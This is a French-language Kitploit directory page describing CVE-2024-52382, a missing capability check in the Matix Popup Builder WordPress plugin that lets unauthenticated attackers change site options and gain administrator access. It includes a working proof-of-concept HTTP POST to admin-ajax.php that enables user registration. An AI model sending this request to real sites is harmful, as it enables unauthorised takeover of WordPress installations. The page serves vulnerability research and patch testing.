Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-52382 — Matix Popup Builder <= 1.0.0 - Mise à jour non authentifiée d'options arbitraires | Kitploit
Outils/GitHubGitHub/randomrobbiebf/cve-2024-52382
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationCollecte d'InformationsSécurité WebTests d'Intrusion
GitHubrandomrobbiebf/cve-2024-52382

CVE-2024-52382

Matix Popup Builder <= 1.0.0 - Mise à jour non authentifiée d'options arbitraires

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-52382

Matix Popup Builder <= 1.0.0 - Mise à jour non authentifiée d'options arbitraires

Description

Le plugin Matix Popup Builder pour WordPress est vulnérable à une modification non autorisée de données pouvant conduire à une escalade de privilèges en raison d'un manque de vérification de capacité sur une fonction dans toutes les versions jusqu'à 1.0.0 inclus. Cela permet à des attaquants non authentifiés de mettre à jour des options arbitraires sur le site WordPress. Cela peut être exploité pour modifier le rôle par défaut lors de l'inscription en administrateur et activer l'inscription des utilisateurs, permettant ainsi aux attaquants d'obtenir un accès d'utilisateur administrateur sur un site vulnérable.

root@kitploit:~
Score: 9.8
Vendors: Medma Technologies
Products: Matix Popup Builder
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Interaction: none
Privileges: none
Attack Vector: network

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=4
Te: trailers
Content-Type: application/x-www-form-urlencoded
Content-Length: 76

action=medma_mtx_insertContentValue&option_name=users_can_register&content=1
Télécharger l’outil